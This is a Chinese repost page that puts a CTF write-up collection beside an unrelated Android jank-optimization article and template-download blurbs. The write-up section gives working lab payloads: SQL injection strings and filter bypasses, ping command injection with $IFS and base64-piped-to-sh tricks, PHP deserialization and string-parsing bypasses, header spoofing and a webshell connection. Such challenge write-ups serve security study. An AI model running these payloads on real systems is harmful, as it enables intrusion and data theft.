不知道为啥子 [极客大挑战 2019]LoveSQL 万能密码尝试 直接上万能密码 用户随意 admin1' or 1; 开始正常注入: 查字段:1' order by 3 经过测试 字段为3 查看回显:1’ union select 1,2,3 查数据库 1' union select 1,2,group_concat(schema_name) from information_schema.schemata 查表: [GXYCTF2019]Ping Ping Ping 考察:RCE的防护绕过 直接构造:?ip=127.0.0.1;ls 简单的fuzz一下 就发现=和$没有过滤 所以想到的思路就是使用$IFS$9代替空格,使用拼接变量来拼接出Flag字符串: 构造playload ?ip=127.0.0.1;a=fl;b=ag;cat$IFS$9$a$b 看看他到底过滤了什么:?ip=127.0.0.1;cat$IFS$1index.php 一目了然过滤了啥,flag字眼也过滤了,bash也没了,不过sh没过滤: 继续构造payload: ?ip=127.0.0.1;echo$IFS$1Y2F0IGZsYWcucGhw|base64$IFS$1-d|sh 查看源码,得到flag flag{1fe312b4-96a0-492d-9b97-040c7e333c1a} [RoarCTF 2019]Easy Calc 进入题目链接 查看源码 发现calc.php 利用PHP的字符串解析特性Bypass,具体看这里 HP需要将所有参数转换为有效的变量名,因此在解析查询字符串时,它会做两件事: 1.删除空白符2.将某些字符转换为下划线(包括空格) scandir():列出参数目录中的文件和目录 发现/被过滤了 ,可以用chr('47')代替 calc.php? num=1;var_dump(scandir(chr(47))) 这里直接上playload calc.php? num=1;var_dump(file_get_contents(chr(47).chr(102).chr(49).chr(97).chr(103).chr(103))) flag{76243df6-aecb-4dc5-879e-3964ec7485ee} [极客大挑战 2019]Knife 进入题目链接 根据题目Knife 还有这个一句话木马 猜想尝试用蚁剑连接 测试连接成功 确实是白给了flag [ACTF2020 新生赛]Exec 直接ping 发现有回显 构造playload: 127.0.0.1;cat /flag 成功拿下flag flag{7e582f16-2676-42fa-8b9d-f9d7584096a6} [极客大挑战 2019]PHP 进入题目链接 它提到了备份文件 就肯定是扫目录 把源文件的代码 搞出来 上dirsearch 下载看这里 很简单的使用方法 用来扫目录 -u 指定url -e 指定网站语言 -w 可以加上自己的字典,要带路径 -r 递归跑(查到一个目录后,重复跑) 打开index.php文件 分析这段内容 1.加载了一个class.php文件 2.采用get方式传递一个select参数 3.随后将之反序列化 打开class.php <?phpinclude 'flag.php';error_reporting(0);class Name{private $username = 'nonono';private $password = 'yesyes';public function __construct($username,$password){$this->username = $username;$this->password = $password;}function __wakeup(){$this->username = 'guest';}function __destruct(){if ($this->password != 100) {echo "</br>NO!!!hacker!!!</br>";echo "You name is: ";echo $this->username;echo "</br>";echo "You password is: ";echo $this->password;echo "</br>";die();}if ($this->username === 'admin') {global $flag;echo $flag;}else{echo "</br>hello my friend~~</br>sorry i can't give you the flag!";die();} }}?> 根据代码的意思可以知道,如果password=100,username=admin 在执行_destruct()的时候可以获得flag 构造序列化 <?phpclass Name{private $username = 'nonono';private $password = 'yesyes';public function __construct($username,$password){$this->username = $username;$this->password = $password;} }$a = new Name('admin', 100);var_dump(serialize($a));?> 得到了序列化 O:4:"Name":2:{s:14:"Nameusername";s:5:"admin";s:14:"Namepassword";i:100;} 但是 还有要求 1.跳过__wakeup()函数 在反序列化字符串时,属性个数的值大于实际属性个数时,就可以 2.private修饰符的问题 private 声明的字段为私有字段,只在所声明的类中可见,在该类的子类和该类的对象实例中均不可见。因此私有字段的字段名在序列化时,类名和字段名前面都会加上\0的前缀。字符串长度也包括所加前缀的长度 构造最终的playload ?select=O:4:%22Name%22:3:{s:14:%22%00Name%00username%22;s:5:%22admin%22;s:14:%22%00Name%00password%22;i:100;} [极客大挑战 2019]Http 进入题目链接 查看 源码 发现了 超链接的标签 说我们不是从https://www.Sycsecret.com访问的 进入http://node3.buuoj.cn:27883/Secret.php 抓包修改一下Referer 执行一下 随后提示我们浏览器需要使用Syclover, 修改一下User-Agent的内容 就拿到flag了 [HCTF 2018]admin 进入题目链接 这道题有三种解法 1.flask session 伪造 2.unicode欺骗 3.条件竞争 发现 登录和注册功能 随意注册一个账号啦 登录进来之后 登录 之后 查看源码 发现提示 猜测 我们登录 admin账号 即可看见flag 在change password页面发现 访问后 取得源码 第一种方法: flask session 伪造 具体,看这里 flask中session是存储在客户端cookie中的,也就是存储在本地。flask仅仅对数据进行了签名。众所周知的是,签名的作用是防篡改,而无法防止被读取。而flask并没有提供加密操作,所以其session的全部内容都是可以在客户端读取的,这就可能造成一些安全问题。 [极客大挑战 2019]BabySQL 进入题目链接 对用户名进行测试 发现有一些关键字被过滤掉了 猜测后端使用replace()函数过滤 11' oorr 1=1 直接尝试双写 万能密码尝试 双写 可以绕过 查看回显: 1' uniunionon selselectect 1,2,3 over!正常 开始注入 爆库 爆列 爆表 爆内容 本篇文章为转载内容。原文链接:https://blog.csdn.net/wo41ge/article/details/109162753。 该文由互联网用户投稿提供,文中观点代表作者本人意见,并不代表本站的立场。 作为信息平台,本站仅提供文章转载服务,并不拥有其所有权,也不对文章内容的真实性、准确性和合法性承担责任。 如发现本文存在侵权、违法、违规或事实不符的情况,请及时联系我们,我们将第一时间进行核实并删除相应内容。
2023-11-13 21:30:33
303
转载
转载文章
...);}public class FPSFrameCallback implements Choreographer.FrameCallback {private static final String TAG = "FPS_TEST";private long mLastFrameTimeNanos = 0;private long mFrameIntervalNanos;public FPSFrameCallback(long lastFrameTimeNanos) {mLastFrameTimeNanos = lastFrameTimeNanos;mFrameIntervalNanos = (long)(1000000000 / 60.0);}@Overridepublic void doFrame(long frameTimeNanos) {//初始化时间if (mLastFrameTimeNanos == 0) {mLastFrameTimeNanos = frameTimeNanos;}final long jitterNanos = frameTimeNanos - mLastFrameTimeNanos;if (jitterNanos >= mFrameIntervalNanos) {final long skippedFrames = jitterNanos / mFrameIntervalNanos;if(skippedFrames>30){//丢帧30以上打印日志Log.i(TAG, "Skipped " + skippedFrames + " frames! "+ "The application may be doing too much work on its main thread.");} }mLastFrameTimeNanos=frameTimeNanos;//注册下一帧回调Choreographer.getInstance().postFrameCallback(this);} } UI绘制全路径分析: 有了前面几个概念,这里我们让SurfaceFlinger结合View的绘制流程用一张图来表达整个绘制流程: 生产者:APP方构建Surface的过程。 消费者:SurfaceFlinger UI绘制全路径分析卡顿原因: 接下来,我们逐个分析,看看都会有哪些原因可能造成卡顿: 1.渲染流程 1.Vsync 调度:这个是起始点,但是调度的过程会经过线程切换以及一些委派的逻辑,有可能造成卡顿,但是一般可能性比较小,我们也基本无法介入; 2.消息调度:主要是 doframe Message 的调度,这就是一个普通的 Handler 调度,如果这个调度被其他的 Message 阻塞产生了时延,会直接导致后续的所有流程不会被触发 3.input 处理:input 是一次 Vsync 调度最先执行的逻辑,主要处理 input 事件。如果有大量的事件堆积或者在事件分发逻辑中加入大量耗时业务逻辑,会造成当前帧的时长被拉大,造成卡顿,可以尝试通过事件采样的方案,减少 event 的处理 4.动画处理:主要是 animator 动画的更新,同理,动画数量过多,或者动画的更新中有比较耗时的逻辑,也会造成当前帧的渲染卡顿。对动画的降帧和降复杂度其实解决的就是这个问题; 5.view 处理:主要是接下来的三大流程,过度绘制、频繁刷新、复杂的视图效果都是此处造成卡顿的主要原因。比如我们平时所说的降低页面层级,主要解决的就是这个问题; 6.measure/layout/draw:view 渲染的三大流程,因为涉及到遍历和高频执行,所以这里涉及到的耗时问题均会被放大,比如我们会降不能在 draw 里面调用耗时函数,不能 new 对象等等; 7.DisplayList 的更新:这里主要是 canvas 和 displaylist 的映射,一般不会存在卡顿问题,反而可能存在映射失败导致的显示问题; 8.OpenGL 指令转换:这里主要是将 canvas 的命令转换为 OpenGL 的指令,一般不存在问题 9.buffer 交换:这里主要指 OpenGL 指令集交换给 GPU,这个一般和指令的复杂度有关 10.GPU 处理:顾名思义,这里是 GPU 对数据的处理,耗时主要和任务量和纹理复杂度有关。这也就是我们降低 GPU 负载有助于降低卡顿的原因; 11.layer 合成:Android P 修改了 Layer 的计算方法 , 把这部分放到了 SurfaceFlinger 主线程去执行, 如果后台 Layer 过多, 就会导致 SurfaceFlinger 在执行 rebuildLayerStacks 的时候耗时 , 导致 SurfaceFlinger 主线程执行时间过长。 可以选择降低Surface层级来优化卡顿。 12.光栅化/Display:这里暂时忽略,底层系统行为; Buffer 切换:主要是屏幕的显示,这里 buffer 的数量也会影响帧的整体延迟,不过是系统行为,不能干预。 2.系统负载 内存:内存的吃紧会直接导致 GC 的增加甚至 ANR,是造成卡顿的一个不可忽视的因素; CPU:CPU 对卡顿的影响主要在于线程调度慢、任务执行的慢和资源竞争,比如 1.降频会直接导致应用卡顿; 2.后台活动进程太多导致系统繁忙,cpu \ io \ memory 等资源都会被占用, 这时候很容易出现卡顿问题 ,这种情况比较常见,可以使用dumpsys cpuinfo查看当前设备的cpu使用情况: 3.主线程调度不到 , 处于 Runnable 状态,这种情况比较少见 4.System 锁:system_server 的 AMS 锁和 WMS 锁 , 在系统异常的情况下 , 会变得非常严重 , 如下图所示 , 许多系统的关键任务都被阻塞 , 等待锁的释放 , 这时候如果有 App 发来的 Binder 请求带锁 , 那么也会进入等待状态 , 这时候 App 就会产生性能问题 ; 如果此时做 Window 动画 , 那么 system_server 的这些锁也会导致窗口动画卡顿 GPU:GPU 的影响见渲染流程,但是其实还会间接影响到功耗和发热; 功耗/发热:功耗和发热一般是不分家的,高功耗会引起高发热,进而会引起系统保护,比如降频、热缓解等,间接的导致卡顿。 如何监控卡顿 线下监控: 我们知道卡顿问题的原因错综复杂,但最终都可以反馈到CPU使用率上来 1.使用dumpsys cpuinfo命令 这个命令可以获取当时设备cpu使用情况,我们可以在线下通过重度使用应用来检测可能存在的卡顿点 A8S:/ $ dumpsys cpuinfoLoad: 1.12 / 1.12 / 1.09CPU usage from 484321ms to 184247ms ago (2022-11-02 14:48:30.793 to 2022-11-02 14:53:30.866):2% 1053/scanserver: 0.2% user + 1.7% kernel0.6% 934/system_server: 0.4% user + 0.1% kernel / faults: 563 minor0.4% 564/signserver: 0% user + 0.4% kernel0.2% 256/ueventd: 0.1% user + 0% kernel / faults: 320 minor0.2% 474/surfaceflinger: 0.1% user + 0.1% kernel0.1% 576/vendor.sprd.hardware.gnss@2.0-service: 0.1% user + 0% kernel / faults: 54 minor0.1% 286/logd: 0% user + 0% kernel / faults: 10 minor0.1% 2821/com.allinpay.appstore: 0.1% user + 0% kernel / faults: 1312 minor0.1% 447/android.hardware.health@2.0-service: 0% user + 0% kernel / faults: 1175 minor0% 1855/com.smartpos.dataacqservice: 0% user + 0% kernel / faults: 755 minor0% 2875/com.allinpay.appstore:pushcore: 0% user + 0% kernel / faults: 744 minor0% 1191/com.android.systemui: 0% user + 0% kernel / faults: 70 minor0% 1774/com.android.nfc: 0% user + 0% kernel0% 172/kworker/1:2: 0% user + 0% kernel0% 145/irq/24-70900000: 0% user + 0% kernel0% 575/thermald: 0% user + 0% kernel / faults: 300 minor... 2.CPU Profiler 这个工具是AS自带的CPU性能检测工具,可以在PC上实时查看我们CPU使用情况。 AS提供了四种Profiling Model配置: 1.Sample Java Methods:在应用程序基于Java的代码执行过程中,频繁捕获应用程序的调用堆栈 获取有关应用程序基于Java的代码执行的时间和资源使用情况信息。 2.Trace java methods:在运行时对应用程序进行检测,以在每个方法调用的开始和结束时记录时间戳。收集时间戳并进行比较以生成方法跟踪数据,包括时序信息和CPU使用率。 请注意与检测每种方法相关的开销会影响运行时性能,并可能影响性能分析数据。对于生命周期相对较短的方法,这一点甚至更为明显。此外,如果您的应用在短时间内执行大量方法,则探查器可能会很快超过其文件大小限制,并且可能无法记录任何进一步的跟踪数据。 3.Sample C/C++ Functions:捕获应用程序本机线程的示例跟踪。要使用此配置,您必须将应用程序部署到运行Android 8.0(API级别26)或更高版本的设备。 4.Trace System Calls:捕获细粒度的详细信息,使您可以检查应用程序与系统资源的交互方式 您可以检查线程状态的确切时间和持续时间,可视化CPU瓶颈在所有内核中的位置,并添加自定义跟踪事件进行分析。在对性能问题进行故障排除时,此类信息可能至关重要。要使用此配置,您必须将应用程序部署到运行Android 7.0(API级别24)或更高版本的设备。 使用方式: Debug.startMethodTracing("");// 需要检测的代码片段...Debug.stopMethodTracing(); 优点:有比较全面的调用栈以及图像化方法时间显示,包含所有线程的情况 缺点:本身也会带来一点的性能开销,可能会带偏优化方向 火焰图:可以显示当前应用的方法堆栈: 3.Systrace Systrace在前面一篇分析启动优化的文章讲解过 这里我们简单来复习下: Systrace用来记录当前应用的系统以及应用(使用Trace类打点)的各阶段耗时信息包括绘制信息以及CPU信息等。 使用方式: Trace.beginSection("MyApp.onCreate_1");alt(200);Trace.endSection(); 在命令行中: python systrace.py -t 5 sched gfx view wm am app webview -a "com.chinaebipay.thirdcall" -o D:\trac1.html 记录的方法以及CPU中的耗时情况: 优点: 1.轻量级,开销小,CPU使用率可以直观反映 2.右侧的Alerts能够根据我们应用的问题给出具体的建议,比如说,它会告诉我们App界面的绘制比较慢或者GC比较频繁。 4.StrictModel StrictModel是Android提供的一种运行时检测机制,用来帮助开发者自动检测代码中不规范的地方。 主要和两部分相关: 1.线程相关 2.虚拟机相关 基础代码: private void initStrictMode() {// 1、设置Debug标志位,仅仅在线下环境才使用StrictModeif (DEV_MODE) {// 2、设置线程策略StrictMode.setThreadPolicy(new StrictMode.ThreadPolicy.Builder().detectCustomSlowCalls() //API等级11,使用StrictMode.noteSlowCode.detectDiskReads().detectDiskWrites().detectNetwork() // or .detectAll() for all detectable problems.penaltyLog() //在Logcat 中打印违规异常信息// .penaltyDialog() //也可以直接跳出警报dialog// .penaltyDeath() //或者直接崩溃.build());// 3、设置虚拟机策略StrictMode.setVmPolicy(new StrictMode.VmPolicy.Builder().detectLeakedSqlLiteObjects()// 给NewsItem对象的实例数量限制为1.setClassInstanceLimit(NewsItem.class, 1).detectLeakedClosableObjects() //API等级11.penaltyLog().build());} } 线上监控: 线上需要自动化的卡顿检测方案来定位卡顿,它能记录卡顿发生时的场景。 自动化监控原理: 采用拦截消息调度流程,在消息执行前埋点计时,当耗时超过阈值时,则认为是一次卡顿,会进行堆栈抓取和上报工作 首先,我们看下Looper用于执行消息循环的loop()方法,关键代码如下所示: / Run the message queue in this thread. Be sure to call {@link quit()} to end the loop./public static void loop() {...for (;;) {Message msg = queue.next(); // might blockif (msg == null) {// No message indicates that the message queue is quitting.return;// This must be in a local variable, in case a UI event sets the loggerfinal Printer logging = me.mLogging;if (logging != null) {// 1logging.println(">>>>> Dispatching to " + msg.target + " " +msg.callback + ": " + msg.what);}...try {// 2 msg.target.dispatchMessage(msg);dispatchEnd = needEndTime ? SystemClock.uptimeMillis() : 0;} finally {if (traceTag != 0) {Trace.traceEnd(traceTag);} }...if (logging != null) {// 3logging.println("<<<<< Finished to " + msg.target + " " + msg.callback);} 在Looper的loop()方法中,在其执行每一个消息(注释2处)的前后都由logging进行了一次打印输出。可以看到,在执行消息前是输出的">>>>> Dispatching to “,在执行消息后是输出的”<<<<< Finished to ",它们打印的日志是不一样的,我们就可以由此来判断消息执行的前后时间点。 具体的实现可以归纳为如下步骤: 1、首先,我们需要使用Looper.getMainLooper().setMessageLogging()去设置我们自己的Printer实现类去打印输出logging。这样,在每个message执行的之前和之后都会调用我们设置的这个Printer实现类。 2、如果我们匹配到">>>>> Dispatching to "之后,我们就可以执行一行代码:也就是在指定的时间阈值之后,我们在子线程去执行一个任务,这个任务就是去获取当前主线程的堆栈信息以及当前的一些场景信息,比如:内存大小、电脑、网络状态等。 3、如果在指定的阈值之内匹配到了"<<<<< Finished to ",那么说明message就被执行完成了,则表明此时没有产生我们认为的卡顿效果,那我们就可以将这个子线程任务取消掉。 这里我们使用blockcanary来做测试: BlockCanary APM是一个非侵入式的性能监控组件,可以通过通知的形式弹出卡顿信息。它的原理就是我们刚刚讲述到的卡顿监控的实现原理。 使用方式: 1.导入依赖 implementation 'com.github.markzhai:blockcanary-android:1.5.0' Application的onCreate方法中开启卡顿监控 // 注意在主进程初始化调用BlockCanary.install(this, new AppBlockCanaryContext()).start(); 3.继承BlockCanaryContext类去实现自己的监控配置上下文类 public class AppBlockCanaryContext extends BlockCanaryContext {....../ 指定判定为卡顿的阈值threshold (in millis), 你可以根据不同设备的性能去指定不同的阈值 @return threshold in mills/public int provideBlockThreshold() {return 1000;}....} 4.在Activity的onCreate方法中执行一个耗时操作 try {Thread.sleep(4000);} catch (InterruptedException e) {e.printStackTrace();} 5.结果: 可以看到一个和LeakCanary一样效果的阻塞可视化堆栈图 那有了BlockCanary的方法耗时监控方式是不是就可以解百愁了呢,呵呵。有那么容易就好了 根据原理:我们拿到的是msg执行前后的时间和堆栈信息,如果msg中有几百上千个方法,就无法确认到底是哪个方法导致的耗时,也有可能是多个方法堆积导致。 这就导致我们无法准确定位哪个方法是最耗时的。如图中:堆栈信息是T2的,而发生耗时的方法可能是T1到T2中任何一个方法甚至是堆积导致。 那如何优化这块? 这里我们采用字节跳动给我们提供的一个方案:基于 Sliver trace 的卡顿监控体系 Sliver trace 整体流程图: 主要包含两个方面: 检测方案: 在监控卡顿时,首先需要打开 Sliver 的 trace 记录能力,Sliver 采样记录 trace 执行信息,对抓取到的堆栈进行 diff 聚合和缓存。 同时基于我们的需要设置相应的卡顿阈值,以 Message 的执行耗时为衡量。对主线程消息调度流程进行拦截,在消息开始分发执行时埋点,在消息执行结束时计算消息执行耗时,当消息执行耗时超过阈值,则认为产生了一次卡顿。 堆栈聚合策略: 当卡顿发生时,我们需要为此次卡顿准备数据,这部分工作是在端上子线程中完成的,主要是 dump trace 到文件以及过滤聚合要上报的堆栈。分为以下几步: 1.拿到缓存的主线程 trace 信息并 dump 到文件中。 2.然后从文件中读取 trace 信息,按照数据格式,从最近的方法栈向上追溯,找到当前 Message 包含的全部 trace 信息,并将当前 Message 的完整 trace 写入到待上传的 trace 文件中,删除其余 trace 信息。 3.遍历当前 Message trace,按照(Method 执行耗时 > Method 耗时阈值 & Method 耗时为该层堆栈中最耗时)为条件过滤出每一层函数调用堆栈的最长耗时函数,构成最后要上报的堆栈链路,这样特征堆栈中的每一步都是最耗时的,且最底层 Method 为最后的耗时大于阈值的 Method。 之后,将 trace 文件和堆栈一同上报,这样的特征堆栈提取策略保证了堆栈聚合的可靠性和准确性,保证了上报到平台后堆栈的正确合理聚合,同时提供了进一步分析问题的 trace 文件。 可以看到字节给的是一整套监控方案,和前面BlockCanary不同之处就在于,其是定时存储堆栈,缓存,然后使用diff去重的方式,并上传到服务器,可以最大限度的监控到可能发生比较耗时的方法。 开发中哪些习惯会影响卡顿的发生 1.布局太乱,层级太深。 1.1:通过减少冗余或者嵌套布局来降低视图层次结构。比如使用约束布局代替线性布局和相对布局。 1.2:用 ViewStub 替代在启动过程中不需要显示的 UI 控件。 1.3:使用自定义 View 替代复杂的 View 叠加。 2.主线程耗时操作 2.1:主线程中不要直接操作数据库,数据库的操作应该放在数据库线程中完成。 2.2:sharepreference尽量使用apply,少使用commit,可以使用MMKV框架来代替sharepreference。 2.3:网络请求回来的数据解析尽量放在子线程中,不要在主线程中进行复制的数据解析操作。 2.4:不要在activity的onResume和onCreate中进行耗时操作,比如大量的计算等。 2.5:不要在 draw 里面调用耗时函数,不能 new 对象 3.过度绘制 过度绘制是同一个像素点上被多次绘制,减少过度绘制一般减少布局背景叠加等方式,如下图所示右边是过度绘制的图片。 4.列表 RecyclerView使用优化,使用DiffUtil和notifyItemDataSetChanged进行局部更新等。 5.对象分配和回收优化 自从Android引入 ART 并且在Android 5.0上成为默认的运行时之后,对象分配和垃圾回收(GC)造成的卡顿已经显著降低了,但是由于对象分配和GC有额外的开销,它依然又可能使线程负载过重。 在一个调用不频繁的地方(比如按钮点击)分配对象是没有问题的,但如果在在一个被频繁调用的紧密的循环里,就需要避免对象分配来降低GC的压力。 减少小对象的频繁分配和回收操作。 好了,关于卡顿优化的问题就讲到这里,下篇文章会对卡顿中的ANR情况的处理,这里做个铺垫。 如果喜欢我的文章,欢迎关注我的公众号。 点击这看原文链接: 参考 Android卡顿检测及优化 一文读懂直播卡顿优化那些事儿 “终于懂了” 系列:Android屏幕刷新机制—VSync、Choreographer 全面理解! 深入探索Android卡顿优化(上) 西瓜卡顿 & ANR 优化治理及监控体系建设 5376)] 参考 Android卡顿检测及优化 一文读懂直播卡顿优化那些事儿 “终于懂了” 系列:Android屏幕刷新机制—VSync、Choreographer 全面理解! 深入探索Android卡顿优化(上) 西瓜卡顿 & ANR 优化治理及监控体系建设 本篇文章为转载内容。原文链接:https://blog.csdn.net/yuhaibing111/article/details/127682399。 该文由互联网用户投稿提供,文中观点代表作者本人意见,并不代表本站的立场。 作为信息平台,本站仅提供文章转载服务,并不拥有其所有权,也不对文章内容的真实性、准确性和合法性承担责任。 如发现本文存在侵权、违法、违规或事实不符的情况,请及时联系我们,我们将第一时间进行核实并删除相应内容。
2023-03-26 08:05:57
214
转载
建站模板下载
...广泛的适用性和出色的兼容性,可在不同设备上自适应展示,提供便捷的企业后台管理界面。该模板下载后即可直接使用,方便快捷,助力企业实现易管理、高效率的后台运营环境。 点我下载 文件大小:180.76 KB 您将下载一个资源包,该资源包内部文件的目录结构如下: 本网站提供模板下载功能,旨在帮助广大用户在工作学习中提升效率、节约时间。 本网站的下载内容来自于互联网。如您发现任何侵犯您权益的内容,请立即告知我们,我们将迅速响应并删除相关内容。 免责声明:站内所有资源仅供个人学习研究及参考之用,严禁将这些资源应用于商业场景。 若擅自商用导致的一切后果,由使用者承担责任。
2023-11-26 08:19:02
135
本站
建站模板下载
...技术开发,具有良好的兼容性和易于修改的特点,是构建专业翻译服务公司网站的理想选择。 点我下载 文件大小:2.33 MB 您将下载一个资源包,该资源包内部文件的目录结构如下: 本网站提供模板下载功能,旨在帮助广大用户在工作学习中提升效率、节约时间。 本网站的下载内容来自于互联网。如您发现任何侵犯您权益的内容,请立即告知我们,我们将迅速响应并删除相关内容。 免责声明:站内所有资源仅供个人学习研究及参考之用,严禁将这些资源应用于商业场景。 若擅自商用导致的一切后果,由使用者承担责任。
2023-12-03 18:44:19
97
本站
建站模板下载
...其优雅的界面和出色的兼容性,可在不同设备上呈现统一且优质的用户体验,是打造专业虚拟货币交易平台的理想选择。 点我下载 文件大小:573.18 KB 您将下载一个资源包,该资源包内部文件的目录结构如下: 本网站提供模板下载功能,旨在帮助广大用户在工作学习中提升效率、节约时间。 本网站的下载内容来自于互联网。如您发现任何侵犯您权益的内容,请立即告知我们,我们将迅速响应并删除相关内容。 免责声明:站内所有资源仅供个人学习研究及参考之用,严禁将这些资源应用于商业场景。 若擅自商用导致的一切后果,由使用者承担责任。
2023-12-23 13:40:13
244
本站
站内搜索
用于搜索本网站内部文章,支持栏目切换。
知识学习
实践的时候请根据实际情况谨慎操作。
随机学习一条linux命令:
grep pattern file.txt
- 在文件中搜索模式。
推荐内容
推荐本栏目内的其它文章,看看还有哪些文章让你感兴趣。
2023-04-28
2023-08-09
2023-06-18
2023-04-14
2023-02-18
2023-04-17
2024-01-11
2023-10-03
2023-09-09
2023-06-13
2023-08-07
2023-03-11
历史内容
快速导航到对应月份的历史文章列表。
随便看看
拉到页底了吧,随便看看还有哪些文章你可能感兴趣。
时光飞逝
"流光容易把人抛,红了樱桃,绿了芭蕉。"